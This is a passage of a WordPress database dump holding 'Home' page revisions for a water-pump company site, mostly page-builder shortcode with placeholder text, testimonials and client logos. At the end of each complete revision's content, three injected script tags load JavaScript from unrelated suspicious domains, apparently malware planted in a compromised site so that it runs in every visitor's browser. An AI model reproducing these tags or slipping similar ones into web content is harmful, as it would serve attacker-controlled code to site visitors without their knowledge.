centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Affordable Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>Experienced People</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"default\"][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Housewife, 2 kids\" quote=\"Quisque sagittis libero tellus. In hac habitasse platea dictumst. Cras convallis ligula eu mi scelerisque placerat. Nulla dui lacus, suscipit quis massa at, pulvinar vulputate ligula. Praesent interdum elementum vehicula.\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Company Secretary, That Biz\" quote=\"Vivamus dapibus elit a nisl suscipit, vitae sollicitudin lectus dapibus. Aliquam interdum consectetur mauris in fermentum. In ullamcorper tortor dolor, id malesuada tellus vestibulum a. Mauris ante erat, mollis vel ligula ac, finibus fermentum tellus.\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"6247\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"Donec ultricies sapien id quam fringilla laoreet. Donec sem metus, facilisis a mauris ut, placerat convallis nibh. Quisque varius velit eu rutrum suscipit. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Ut eu aliquam lacus. Donec sed turpis vel massa tincidunt elementum. Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 00:56:55','2018-01-30 00:56:55','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6683,1,'2018-01-30 01:03:19','2018-01-30 01:03:19','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6678\" bg_position=\"center bottom\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"slow\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"20%\" bottom_padding=\"20%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"waves_opacity\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273391931{margin-bottom: 10px !important;}\"]\r\n<h5>Our Agent</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"See more\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273410378{margin-bottom: 10px !important;}\"]\r\n<h5>Contact Us</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Drop us a message\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273960070{margin-bottom: 10px !important;}\"]\r\n<h5>Our Product</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Find our products\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273982432{margin-bottom: 10px !important;}\"]\r\n<h5>Frequently Asked Question</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Get the answer\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517274001996{margin-bottom: 10px !important;}\"]\r\n<h5>Article Area</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Tips and tricks\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Why Choose Us</h2>\r\n<h5><span style=\"color: #bbbbbb;\">A bit good reasons</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"8%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Hot Looks</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Best Price</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>True Power</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\"  icon_size=\"\" animation_delay=\"1200\" image=\"basic_anchor.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"1200\"][vc_column_text]\r\n<h5>Happy Service</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"https://source.unsplash.com/collection/430468/daily\" bg_position=\"center center\" bg_repeat=\"no-repeat\" bg_color=\"#454156\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"9%\" bottom_padding=\"9%\" id=\"intro\" row_name=\"Intro\" enable_gradient=\"true\" color_overlay=\"#0a0a0a\" color_overlay_2=\"rgba(102,102,102,0.74)\" gradient_direction=\"left_b_to_right_t\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-6-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_custom_heading text=\"Best Water Pump You Can Find\" font_container=\"tag:h1|font_size:83|text_align:center|color:%23ffffff|line_height:96px\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\" css=\".vc_custom_1485550874781{margin-top: -10px !important;}\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"100\"][vc_custom_heading text=\"We will help you a lot!\r\n\" font_container=\"tag:p|text_align:center|color:rgba(255%2C255%2C255%2C0.7)\" use_theme_fonts=\"yes\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"grow-in\" column_padding=\"padding-4-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][nectar_btn size=\"large\" button_style=\"regular\" button_color_2=\"Accent-Color\" icon_family=\"iconsmind\" url=\"#\" text=\"Show Me How\" icon_iconsmind=\"iconsmind-Triangle-ArrowRight\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2018-01-30 01:03:19','2018-01-30 01:03:19','',5,'https://sandbox.futuremediatrix.com/dabinter/5-revision-v1/',0,'revision','',0),(6684,1,'2018-01-30 01:03:34','2018-01-30 01:03:34','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"6678\" bg_position=\"center bottom\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"slow\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"20%\" bottom_padding=\"20%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"waves_opacity\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>PT Dabinter Pompa Air</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Text here</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517272578121{margin-bottom: 10px !important;}\"]\r\n<h5>Dabinter Call Center</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Call : 5678910\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273391931{margin-bottom: 10px !important;}\"]\r\n<h5>Our Agent</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"See more\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273410378{margin-bottom: 10px !important;}\"]\r\n<h5>Contact Us</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Drop us a message\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" equal_height=\"yes\" content_placement=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"8%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" font_color=\"#ffffff\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273960070{margin-bottom: 10px !important;}\"]\r\n<h5>Our Product</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Find our products\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517273982432{margin-bottom: 10px !important;}\"]\r\n<h5>Frequently Asked Question</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Get the answer\"][/vc_column][vc_column enable_animation=\"true\" animation=\"flip-in-vertical\" column_padding=\"padding-2-percent\" column_padding_position=\"all\" background_color=\"#4066b3\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" el_class=\"block-home\" width=\"1/3\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1517274001996{margin-bottom: 10px !important;}\"]\r\n<h5>Article Area</h5>\r\n[/vc_column_text][nectar_cta btn_style=\"see-through\" heading_tag=\"h6\" text_color=\"#ffffff\" link_type=\"regular\" alignment=\"left\" link_text=\"Tips and tricks\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"8%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" 